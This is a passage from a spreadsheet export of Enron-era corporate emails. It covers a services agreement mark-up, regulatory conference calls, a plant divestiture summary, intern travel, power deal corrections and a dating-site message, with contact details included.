&gt; &gt; Lehman Brothers_x000D_
&gt; &gt; (646) 836-2011/0609 (fax)_x000D_
&gt; &gt; kdautenh@lehman.com_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; --------------------------------------------------------------------------_x000D_
&gt; ----_x000D_
&gt;_x000D_
&gt; This message is intended only for the personal and confidential use of the_x000D_
&gt; designated recipient(s) named above.  If you are not the intended_x000D_
&gt; recipient_x000D_
&gt; of this message you are hereby notified that any review, dissemination,_x000D_
&gt; distribution or copying of this message is strictly prohibited.  This_x000D_
&gt; communication is for information purposes only and should not be regarded_x000D_
&gt; as an offer to sell or as a solicitation of an offer to buy any financial_x000D_
&gt; product, an official confirmation of any transaction, or as an official_x000D_
&gt; statement of Lehman Brothers Inc.  Email transmission cannot be guaranteed_x000D_
&gt; to be secure or error-free.  Therefore, we do not represent that this_x000D_
&gt; information is complete or accurate and it should not be relied upon as_x000D_
&gt; such.  All information is subject to change without notice._x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
------------------------------------------------------------------------------_x000D_
This message is intended only for the personal and confidential use of the _x000D_
designated recipient(s) named above.  If you are not the intended recipient _x000D_
of this message you are hereby notified that any review, dissemination, _x000D_
distribution or copying of this message is strictly prohibited.  This _x000D_
communication is for information purposes only and should not be regarded as _x000D_
an offer to sell or as a solicitation of an offer to buy any financial _x000D_
product, an official confirmation of any transaction, or as an official _x000D_
statement of Lehman Brothers Inc.  Email transmission cannot be guaranteed to _x000D_
be secure or error-free.  Therefore, we do not represent that this _x000D_
information is complete or accurate and it should not be relied upon as _x000D_
such.  All information is subject to change without notice._x000D_
</t>
  </si>
  <si>
    <t>Wed, 19 Apr 2000 06:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'susan.musch@enron.com'})</t>
  </si>
  <si>
    <t>Re: Revised Australian Services Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">David,_x000D_
_x000D_
I am attaching my September 9, 1999 memo on the tax issues associated with _x000D_
the financial trader in Sydney.  It clearly summarizes not only our internal _x000D_
discussions at that time but also the advice that PWC-Sydney gave regarding _x000D_
using a mark-up.  Please let me know when you and Heidi would be available to _x000D_
discuss the mark-up in more detail so that we can quickly resolve this issue _x000D_
and execute the agreement._x000D_
_x000D_
Best regards,_x000D_
Susan_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
David Minns_x000D_
04/18/2000 12:22 AM_x000D_
To: Susan Musch/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Heidi Mason/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Shari Stack@ECT _x000D_
_x000D_
Subject: Re: Revised Australian Services Agreement  _x000D_
_x000D_
I've checked my notes and spoken to Heidi and it appears the delay was _x000D_
settling the mark up (107.5%) in the Agreement. Heidi believes that this _x000D_
figure can be reduced to 100% (which is current practice). If everyone is _x000D_
agreeable I will arrange execution.  _x000D_
_x000D_
_x000D_
_x000D_
David Minns_x000D_
04/18/2000 02:35 PM_x000D_
To: Susan Musch/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Heidi Mason/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: Re: Revised Australian Services Agreement  _x000D_
_x000D_
Susan this is the latest version of the Services re ENA/EAPL. There is a note _x000D_
on my file that the percentage uplift. _x000D_
_x000D_
_x000D_
_x000D_
Shari Stack@ECT_x000D_
09/18/99 06:32 AM_x000D_
To: Susan Musch/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Alan Aronowitz@ECT, Gary Hickerson@ECT, Harry Arora@ECT, Colin _x000D_
Jackson@ECT, Paul Quilkey/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, David _x000D_
Minns/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Heidi _x000D_
Mason/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Barbara Lewis/HOU/ECT@ECT _x000D_
_x000D_
Subject: Revised Australian Services Agreement_x000D_
_x000D_
Attached please find my mark-up of the Australian Services Agreement. I have _x000D_
attached a blacklined version for ease of reference. _x000D_
_x000D_
Apart from changing the name from ECT to ENA, I have modified clause 1 in _x000D_
Schedule 1 to more accurately reflect the intended products._x000D_
_x000D_
_x000D_
_x000D_
Please call me if any questions. _x000D_
_x000D_
Many thanks, _x000D_
_x000D_
Shari_x000D_
_x000D_
 _x000D_
---------------------- Forwarded by Shari Stack/HOU/ECT on 09/17/99 02:25 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Susan Musch@ENRON_DEVELOPMENT_x000D_
09/15/99 07:30 PM_x000D_
To: Shari Stack@ENRON_DEVELOPMENT, Alan Aronowitz@ECT, Gary Hickerson@ECT, _x000D_
Harry Arora@ECT, Colin Jackson@ECT, Paul _x000D_
Quilkey/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, David _x000D_
Minns/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Heidi _x000D_
Mason/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:  _x000D_
Subject: Draft of Australian Services Agreement_x000D_
_x000D_
Attached is a draft of the services agreement for the financial trading _x000D_
services to be provided by the Australian trading office for ECT-Houston.  _x000D_
Please review the agreement and let me know if you have any questions, _x000D_
comments or revisions._x000D_
_x000D_
Best regards,_x000D_
Susan_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 12:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'william.fleenor@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Your esteemed colleague suggested I send this to you for your review._x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 04/25/2001 07:10 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Kay Mann_x000D_
04/19/2001 04:17 PM_x000D_
To: Reagan Rorschach/Enron@EnronXGate, David Fairley/Enron@EnronXGate, Ozzie _x000D_
Pagan/Enron@EnronXGate, Lloyd Will/HOU/ECT@ECT, Christi L _x000D_
Nicolay/HOU/ECT@ECT, Tom May/Corp/Enron@Enron, Edith Cross/HOU/ECT@ECT, Jim _x000D_
Homco/HOU/ECT@ECT, Edward Sacks/Enron@EnronXGate_x000D_
cc:  _x000D_
_x000D_
Subject: MDEA revised draft_x000D_
_x000D_
_x000D_
Here's the latest, not-yet-final-but-getting-better agreement._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
I may not have sent this to everyone who needs it, but I know Reagan will _x000D_
take care of it.  Speaking of Reagan, he is generating exhibits._x000D_
_x000D_
Kay_x000D_
</t>
  </si>
  <si>
    <t>Thu, 13 Jan 2000 09:33:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'brandon.neff@enron.com', 'vito.iaia@enron.com'})</t>
  </si>
  <si>
    <t>Re: Medical Alert!!</t>
  </si>
  <si>
    <t xml:space="preserve">This refers to you two._x000D_
---------------------- Forwarded by Benjamin Rogers/HOU/ECT on 01/13/2000 _x000D_
05:32 PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Ben F Jacoby                           01/13/2000 04:57 PM_x000D_
	_x000D_
_x000D_
To: Benjamin Rogers/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Medical Alert!!  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Newbrund@aol.com on 01/12/2000 10:48:59 PM_x000D_
To: costaoeste@worldnet.att.net, marc.bayer@aktanker.com, spberman@jps.net, _x000D_
dfeldman@adelphia.net, MMGara@aol.com, GeigerMorg@aol.com, _x000D_
JGu3520471@aol.com, aahj@classic.msn.com, Ben F Jacoby/HOU/ECT@ECT, _x000D_
Pkrk38@aol.com, deb-dan@home.com, mmintz@weather.com, smintz@emanuelsf.org, _x000D_
TawongaDeb@aol.com, newbrun@itsa.ucsf.edu, Peckbaf@aol.com, MDZZZZ@aol.com, _x000D_
hreshef@pol.net, sshapira@hadassah.org.il, Brent.Sommer@ncal.kaiperm.org, _x000D_
msopher@ucla.edu, r_sopher@netvision.net.il, GTStraw@aol.com, _x000D_
jonwong@earthlink.net, kzuckerman@yahoo.com_x000D_
cc:  _x000D_
Subject: Medical Alert!!_x000D_
_x000D_
_x000D_
_x000D_
Please see  attached file._x000D_
 - Medical1.doc_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 4 Feb 2002 11:59:47 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'debra.bailey@enron.com', 'corry.bentley@enron.com', 'don.baughman@enron.com'})</t>
  </si>
  <si>
    <t>Kevin Burns</t>
  </si>
  <si>
    <t>When: Wednesday, February 13, 2002 12:00 PM-3:00 PM (GMT-06:00) Central Time (US &amp; Canada)._x000D_
Where: tbd_x000D_
_x000D_
*~*~*~*~*~*~*~*~*~*_x000D_
_x000D_
Review available services with OATI for East, West &amp; Canada.</t>
  </si>
  <si>
    <t>Thu, 1 Jun 2000 01:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Susan Scotts Expense Report</t>
  </si>
  <si>
    <t xml:space="preserve">OK.  DF_x000D_
---------------------- Forwarded by Drew Fossum/ET&amp;S/Enron on 06/01/2000 _x000D_
07:59 AM ---------------------------_x000D_
_x000D_
_x000D_
JANET CONES_x000D_
05/31/2000 03:47 PM_x000D_
To: Drew Fossum/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Susan Scotts Expense Report_x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
I have the copy with the receipts if you want to see it when you are here in _x000D_
Houston._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 16 Apr 2001 12:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Portland General - Quarterly Comparisons (2001 Plan vs 2000_x000D_
 Actuals)</t>
  </si>
  <si>
    <t>Rick, in our meeting in Portland on March 29th, you requested a reconciliation_x000D_
of Quarterly results for our 2001 Plan vs 2000 Actual results.  _x000D_
_x000D_
Attached is this comparison that has been reviewed by Jim Piro and Rod_x000D_
Hayslett.  If you have any questions or would like to discuss this, let me_x000D_
know and I'll set up a conference call with you, Jim Piro and myself to go_x000D_
through this.   (503) 464-7121._x000D_
_x000D_
Thanks Rick.</t>
  </si>
  <si>
    <t>Sat, 19 Jan 2002 21:36:28 -0800 (PST)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/19/02; HourAhead hour: 20;  HourAhead schedule download failed. Manual intervention required._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002011920.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2 Aug 2000 10:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sarah.novosel@enron.com', 'daniel.allegretti@enron.com', 'ron.mcnamara@enron.com', 'janine.migden@enron.com', 'dan.staines@enron.com', 'charles.yeung@enron.com', 'steve.walton@enron.com', 'howard.fromer@enron.com', 'christi.nicolay@enron.com', 'steve.montovano@enron.com', 'tom.delaney@enron.com', 'jeff.brown@enron.com', 'kerry.stroup@enron.com', 'joe.hartsoe@enron.com', 'robin.kittel@enron.com'})</t>
  </si>
  <si>
    <t>Transmission / Wholesale Market Regional Plans</t>
  </si>
  <si>
    <t xml:space="preserve">1. I appreciate everyone who participated in the call today.  I think that _x000D_
the discussion proved that we can find consensus on a reasonable approach for _x000D_
transmission pricing and energy markets._x000D_
_x000D_
2. To make more clear about the Regional Plans, I think that we need to _x000D_
consider the following._x000D_
_x000D_
A. BACKGROUND_x000D_
_x000D_
Timelines of Current Process_x000D_
Current Players &amp; Current Positions_x000D_
Allies _x000D_
Key Issues now facing the process_x000D_
_x000D_
B. MOVING FORWARD_x000D_
_x000D_
Top Issues upcoming_x000D_
External Factors (e.g., will Entergy join SPP)_x000D_
Resource Needs_x000D_
Relationship to Commercial Objectives / Business Plans_x000D_
_x000D_
C. OTHER ISSUES / CONCLUSION_x000D_
_x000D_
I hope this helps set an outline for the Regional Plans.  The key idea is _x000D_
that I want to make sure everyone has a calendar of where we are going and _x000D_
what issues need to be addressed.  Don't be shy about adding other topics and _x000D_
issues.  We need to have this to communicate within our group and to the _x000D_
commercial people.  I don't expect this to be easy, but I think that it will _x000D_
be helpful._x000D_
_x000D_
3. I think that we need to put more detail around the entire structure.  This _x000D_
would entail developing four things (1) a tariff, (2) ISO Systems &amp; _x000D_
Procedures, (3) Day Ahead PX Energy Market, (4) Transmission Flowgate PX _x000D_
Market.  These are the four building blocks to a New Marketplace._x000D_
_x000D_
My hope is for Enron to put these things out in a detailed framework using _x000D_
"off the shelf" material.  I know that Tom Delaney has already started _x000D_
working on a tariff.  I think we could adapt the Cal PX model into point 3.  _x000D_
We could probably use the APX Flowgate System for point 4.  On the ISO, maybe _x000D_
we could go to ESCA and have a Detailed Scope / Work Plan and fees on setting _x000D_
up an ISO (including costs of operation over time).  It would make sense to _x000D_
me to do this very formally (including setting energy market zones and _x000D_
defining the commercially significant Flowgates).  I would use the MISO as _x000D_
the market to focus on, but am willing to listen to other thoughts._x000D_
_x000D_
Please let me know what everyone thinks._x000D_
_x000D_
Jim_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 7 May 2001 11:37:37 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'chris.stokley@enron.com', 'donna.johnson@enron.com'})</t>
  </si>
  <si>
    <t>Details</t>
  </si>
  <si>
    <t xml:space="preserve">My apology.  The spreadsheet he sent me had the same file name of the one he_x000D_
sent you so I thought you had this._x000D_
_x000D_
 &lt;&lt;April 00 thru June 00 retro Enron Request.xls&gt;&gt;_x000D_
_x000D_
_x000D_
Keoni Almeida_x000D_
California Independent System Operator_x000D_
phone: 916/608-7053_x000D_
pager:  916/814-7352_x000D_
alpha page:  9169812000.1151268@pagenet.net_x000D_
e-mail:  &lt;mailto:kalmeida@caiso.com&gt;_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - April 00 thru June 00 retro Enron Request.xls </t>
  </si>
  <si>
    <t>Tue, 24 Oct 2000 04:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: More Lincoln Questions</t>
  </si>
  <si>
    <t xml:space="preserve">Ben -_x000D_
_x000D_
My answers are in Red.  Ross, can you answer the one on #6 compressor?_x000D_
_x000D_
Mitch_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Benjamin Rogers@ECT_x000D_
10/24/2000 11:21 AM_x000D_
To: Mitch Robinson/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: More Lincoln Questions_x000D_
_x000D_
Mitch:_x000D_
More questions on Lincoln.  These guys are only looking at Lincoln, so all of _x000D_
these should be just Lincoln questions.  Thanks again!_x000D_
Ben_x000D_
---------------------- Forwarded by Benjamin Rogers/HOU/ECT on 10/24/2000 _x000D_
11:20 AM ---------------------------_x000D_
_x000D_
_x000D_
"Michael P Cazaubon" &lt;michael.cazaubon@exeloncorp.com&gt; on 10/24/2000 11:06:42 _x000D_
AM_x000D_
To: benjamin.rogers@enron.com_x000D_
cc: "David L Stewart" &lt;david.stewart@exeloncorp.com&gt; _x000D_
Subject: More Lincoln Questions_x000D_
_x000D_
_x000D_
Ben,_x000D_
_x000D_
Thanks for the response on the first set of questions on Lincoln.  Attached_x000D_
are some additional ones that we would appreciate your help on_x000D_
_x000D_
Thanks!_x000D_
Mike Cazaubon_x000D_
_x000D_
(See attached file: Exelon Lincoln Q&amp;A 10-24-00.doc)_x000D_
_x000D_
************************************************************************_x000D_
This e-mail and any of its attachments may contain Exelon Corporation_x000D_
proprietary information, which is privileged, confidential, or subject_x000D_
to copyright belonging to the Exelon Corporation family of Companies.  This_x000D_
e-mail is intended solely for the use of the individual or entity to_x000D_
which it is addressed.  If you are not the intended recipient of this_x000D_
e-mail, you are hereby notified that any dissemination, distribution,_x000D_
copying, or action taken in relation to the contents of and attachments_x000D_
to this e-mail is strictly prohibited and may be unlawful.  If you have_x000D_
received this e-mail in error, please notify the sender immediately and_x000D_
permanently delete the original and any copy of this e-mail and any_x000D_
printout. Thank You._x000D_
************************************************************************_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 12 Sep 2001 10:59:36 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Vegas</t>
  </si>
  <si>
    <t>T.J. FORNEY WILL TALK TO YOU LATER TODAY ABOUT STEVE.  IF IT WAS UP TO ME I WOULD BUY STEVE'S AIRLINE TICKET.  STEVE HAS AGREED TO THE AIRLINE TICKET.  HE KNOWS THAT THE SHOW AND GOLFING HAS BEEN BOOKED UP.  THANKS_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Black, Tamara Jae  _x000D_
Sent:	Wednesday, September 12, 2001 12:12 PM_x000D_
To:	Hernandez, Juan_x000D_
Subject:	Vegas_x000D_
_x000D_
Hey...did you talk to Forney about Olinde going to Vegas..._x000D_
_x000D_
T.Jae Black_x000D_
East Power Trading_x000D_
Assistant to Kevin Presto_x000D_
off. 713-853-5800_x000D_
fax 713-646-8272_x000D_
cell 713-539-4760</t>
  </si>
  <si>
    <t>Wed, 28 Jun 2000 10:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Dale Nesbitt</t>
  </si>
  <si>
    <t xml:space="preserve">Greg,_x000D_
_x000D_
Dale Nesbitt is a consultant who develops pricing models (spot and fwd)_x000D_
prices for E-commerce sites. He will be in Houston in the beginning of July._x000D_
Any interest in meeting him?_x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 06/28/2000 _x000D_
05:24 PM ---------------------------_x000D_
_x000D_
_x000D_
VKaminski@aol.com on 06/11/2000 03:17:23 PM_x000D_
To: vkamins@enron.com_x000D_
cc:  _x000D_
Subject: Dale Nesbitt_x000D_
_x000D_
_x000D_
o:   &lt;Vince.J.Kaminski@enron.com&gt;_x000D_
cc:_x000D_
Subject:  RE: Follow up_x000D_
_x000D_
_x000D_
Vince:_x000D_
_x000D_
Thanks for your help in this matter.  I dont want to be a bother to you.  I_x000D_
know you are doing your best to put this together as a go between._x000D_
_x000D_
As you might suspect, I am in a hurry to put together the right hearing at_x000D_
Enron because MarketPoint is just now being completed--U.S. and world oil_x000D_
and gas and North American electricity.  We have just signed up our first_x000D_
web provider (e-Acumen.com), who is preparing to vend our North American_x000D_
electric generation data base over their website.  I believe we are an_x000D_
integral part of their offering.  It wont be long before MarketPoint needs_x000D_
the capitalization to meet our growing customer needs professionally and_x000D_
quickly, particularly when we sign up one or more vertical portals to vend_x000D_
or offer fundamental forward projections from our models.  I a loath to do_x000D_
so without the capitalization and staffing we need.  Also, I am loath to do_x000D_
so without the market reach that a partner like Enron could render instantly_x000D_
available._x000D_
_x000D_
I also would be eager during my next trip to Houston to continue the_x000D_
discussion with you regarding how MarketPoint might benefit Enron directly._x000D_
I plan to be there the last week in June._x000D_
_x000D_
Thanks again for all your help and support._x000D_
_x000D_
Dale_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 4 May 2001 15:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Western Wholesale Activities - Gas &amp; Power Conf. Call_x000D_
 Privileged &amp; Confidential Communication Attorney-Client Communication and_x000D_
 Attorney Work Product Privileges Asserted</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
---------------------- Forwarded by Phillip K Allen/HOU/ECT on 05/04/2001 10:15 AM ---------------------------_x000D_
_x000D_
_x000D_
James D Steffes@ENRON_x000D_
05/03/2001 05:44 AM_x000D_
To:	Phillip K Allen/HOU/ECT@ECT_x000D_
cc:	 _x000D_
Subject:	Re: Western Wholesale Activities - Gas &amp; Power Conf. Call_x000D_
Privileged &amp; Confidential Communication_x000D_
Attorney-Client Communication and Attorney Work Product Privileges Asserted_x000D_
_x000D_
Please forward to anyone on your team that wants updates on Western wholesale matters (should also give you an opportunity to raise state matters if you want to discuss)._x000D_
_x000D_
Jim_x000D_
---------------------- Forwarded by James D Steffes/NA/Enron on 05/03/2001 07:42 AM ---------------------------_x000D_
_x000D_
_x000D_
Ray Alvarez_x000D_
05/02/2001 05:40 PM_x000D_
To:	Steve Walton/HOU/ECT@ECT, Susan J Mara/NA/Enron@ENRON, Alan Comnes/PDX/ECT@ECT, Leslie Lawner/NA/Enron@Enron, Rebecca W Cantrell/HOU/ECT@ECT, Donna Fulton/Corp/Enron@ENRON, Jeff Dasovich/NA/Enron@Enron, Christi L Nicolay/HOU/ECT@ECT, James D Steffes/NA/Enron@Enron, jalexander@gibbs-bruns.com, Phillip K Allen/HOU/ECT@ECT_x000D_
cc:	Linda J Noske/HOU/ECT@ECT _x000D_
_x000D_
Subject:	Re: Western Wholesale Activities - Gas &amp; Power Conf. Call_x000D_
Privileged &amp; Confidential Communication_x000D_
Attorney-Client Communication and Attorney Work Product Privileges Asserted_x000D_
_x000D_
Date:			Every Thursday_x000D_
Time: 			1:00 pm Pacific, 3:00 pm Central, and 4:00 pm Eastern time,_x000D_
 Number: 		1-888-271-0949, _x000D_
 Host Code:		661877, (for Jim only),_x000D_
 Participant Code:	936022, (for everyone else),_x000D_
_x000D_
Attached is the table of the on-going FERC issues and proceedings updated for use on tomorrow's conference call.  It is available to all team members on the O drive. Please feel free to revise/add to/ update this table as appropriate._x000D_
_x000D_
Proposed agenda for tomorrow:_x000D_
_x000D_
Power-  Discussion of FERC market monitoring and mitigation order in EL00-95-12 and review of upcoming filings_x000D_
Gas-	Response to subpoenas of SoCal Edison in RP00-241 and upcoming items_x000D_
Misc._x000D_
_x000D_
I will be unable to participate in the call tomorrow as I will be attending the Senate Energy and Resource Committee Hearing on the elements of the FERC market monitoring and mitigation order._x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 May 2001 17:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Report for Louise</t>
  </si>
  <si>
    <t xml:space="preserve">That's correct. Percopo works for Lee._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kitchen, Louise  _x000D_
Sent:	Wednesday, May 30, 2001 1:55 PM_x000D_
To:	Deffner, Joseph_x000D_
Subject:	RE: Report for Louise_x000D_
_x000D_
The numbers look good._x000D_
_x000D_
Return date - June 18th._x000D_
_x000D_
Is Lee above Bob?  I presume so - don't mind the dinner but some time at the end of June._x000D_
_x000D_
Regards_x000D_
_x000D_
Louise_x000D_
_x000D_
_x000D_
From:	Joseph Deffner/ENRON@enronXgate on 05/30/2001 01:51 PM_x000D_
To:	Louise Kitchen/HOU/ECT@ECT_x000D_
cc:	 _x000D_
_x000D_
Subject:	RE: Report for Louise_x000D_
_x000D_
Hey there! Congrats with Scott William. I hope all is going well. Fifteen days and counting till our third arrival. I've attached the DASH that documented the divestiture. The quick summary of the economics per Heather Kroll are as follows:_x000D_
_x000D_
Original Basis of $8mm._x000D_
Signed the Purchase and Sale Agreement on May 16 for $22mm (gain of $14mm)_x000D_
_x000D_
Sold put for $3.5mm with $1.7mm granted to origination. I don't know for sure what the desk booked._x000D_
The coal supply contract resulted in $5mm mark to market to EGM._x000D_
_x000D_
The FERC 203 filing has been made regarding market power. They are not expecting any issues with FERC or the North Carolina commission and expect final approval by the beginning of July._x000D_
_x000D_
Net gain of about $21mm on transaction._x000D_
_x000D_
Chris Lee, the managing partner of Highstar, has requested the opportunity to take you and I out to dinner sometime after you've returned and settled back in to discuss the merits of Enron's investment in Highstar. If that's of interest let me know and I can schedule some time._x000D_
_x000D_
Once again, congratulations. Do you have an expected return date yet?_x000D_
Joe_x000D_
_x000D_
 &lt;&lt; File: DASH_ALAMACDIVEST_051401.doc &gt;&gt; _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Schoppe, Tammie  _x000D_
Sent:	Tuesday, May 29, 2001 4:18 PM_x000D_
To:	Deffner, Joseph_x000D_
Subject:	Report for Louise_x000D_
_x000D_
Hi Joe,_x000D_
_x000D_
Louise would like you to send her an update on AIG Highstar via email.  Please let me know if you have any questions._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Tammie_x000D_
x34220_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 05:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Jinbaek Kim</t>
  </si>
  <si>
    <t xml:space="preserve">Molly,_x000D_
_x000D_
We can pay for the plane ticket._x000D_
We have to make sure that we shall extend the same_x000D_
treatment to other summer interns to avoid_x000D_
bad feelings._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
From: Molly Magee/ENRON@enronXgate on 04/25/2001 11:47 AM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT, Stinson Gibner/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Jinbaek Kim_x000D_
_x000D_
We received some correspondence this morning from Jinbaek in which he says he _x000D_
plans to start on June 4, 2001.   Since we are trying to offer a package _x000D_
comparable to that of an Associate in the Program, I assume we will also pay _x000D_
for his plane ticket here???    Just wanted to check before I contacted _x000D_
him...., so I'll wait to hear from you._x000D_
_x000D_
Thanks,_x000D_
Molly_x000D_
x34804_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 12 Dec 2001 13:32:04 -0800 (PST)</t>
  </si>
  <si>
    <t>This is a copy of your message sent to Uniteus4everr@talkmatch.com --&gt;_x000D_
_x000D_
Hello,_x000D_
_x000D_
I noticed your picture and profile.  That is a very good picture of you.  I sent along my profile, check it out.  I'd sure like to hear from you!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Click the following link to view the sender's profile:_x000D_
http://www.match.com/doubleblind/showprofile.asp?UserID=484948454C4B4E&amp;trackingid=65685_x000D_
_x000D_
The following is my profile text:_x000D_
_x000D_
Hello, I'm a down to earth person that likes to laugh and have a good time. I work in downtown Denver as a commodities trader for a large energy trading house. I do enjoy my career but understand life needs to be kept in prospective and be balanced. I enjoy activities over sitting and watching, but I have been known to sit in front of the TV and watch football or college basketball all day. I'm looking for someone who enjoys life and doesn't take themselves too seriously. _x000D_
_x000D_
*********************************************************_x000D_
_x000D_
ADDITIONAL TIPS from Match.com:_x000D_
_x000D_
Our anonymous re-mailer will strip away your real email address, so _x000D_
that it will NOT appear in the 'From:' line._x000D_
_x000D_
You may also contact this person from their Match.com profile by _x000D_
clicking 'Contact this person' and composing your message directly from the _x000D_
site._x000D_
_x000D_
However:_x000D_
_x000D_
* Check to ensure that your email address is not in the BODY of your _x000D_
message as we are unable to remove these._x000D_
_x000D_
* Check to ensure that you REMOVE ANY AUTOMATIC SIGNATURE at the end of _x000D_
_x000D_
your email. And note that you cannot use 'Cc:' or 'Bcc:' if you want _x000D_
your email to remain anonymous._x000D_
_x000D_
Match.com does not monitor private email between members, nor are we _x000D_
liable for the content of these messages. All members are bound by our _x000D_
Match.com Service Agreement.</t>
  </si>
  <si>
    <t>Mon, 10 Dec 2001 08:41:30 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'larry.may@enron.com', 'mike.maggi@enron.com', 'john.arnold@enron.com'})</t>
  </si>
  <si>
    <t>FW: FW: Why cows hate snow.....?</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 _x000D_
 - damnsnow.mpe </t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 01:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'chris.foster@enron.com', 'audrey.cook@enron.com'})</t>
  </si>
  <si>
    <t>Re: Deal #576468.1 &amp; 572069.1 (4/6/2001 &amp; 4/7/2001)</t>
  </si>
  <si>
    <t xml:space="preserve">I've modified these deals to read as follows:_x000D_
_x000D_
572069_x000D_
West Services buys from APX_x000D_
NP-15_x000D_
On Peak - 12 MW @ $245 for flow 4/6-4/7_x000D_
Off Peak - 12 MW @ $150 for flow 4/7_x000D_
TOTAL MWH = 480_x000D_
_x000D_
576468_x000D_
West Services buys from APX_x000D_
NP-15_x000D_
Off Peak - 12 MW @ $140 for flow 4/6_x000D_
TOTAL MWH = 96_x000D_
_x000D_
Please let me know if this is correct. (I hope!) And don't hesitate to call _x000D_
me with questions or other deal corrections. I will be running between two _x000D_
different desks today, so if you can't reach me at my regular extension _x000D_
(503-464-7486), I can be reached at 503-464-3823._x000D_
_x000D_
Thanks,_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Chris H Foster                           04/10/2001 07:52 AM_x000D_
	_x000D_
_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Deal #576468.1 &amp; 572069.1 (4/6/2001 &amp; 4/7/2001)_x000D_
_x000D_
Kate:_x000D_
_x000D_
Can you please modify that deal that you made the price $140 yesterday to _x000D_
make it for the 6th only?  The 7th is all at $150._x000D_
_x000D_
Thanks_x000D_
_x000D_
C_x000D_
---------------------- Forwarded by Chris H Foster/HOU/ECT on 04/10/2001 _x000D_
09:58 AM ---------------------------_x000D_
_x000D_
_x000D_
Audrey Cook_x000D_
04/10/2001 07:51 AM_x000D_
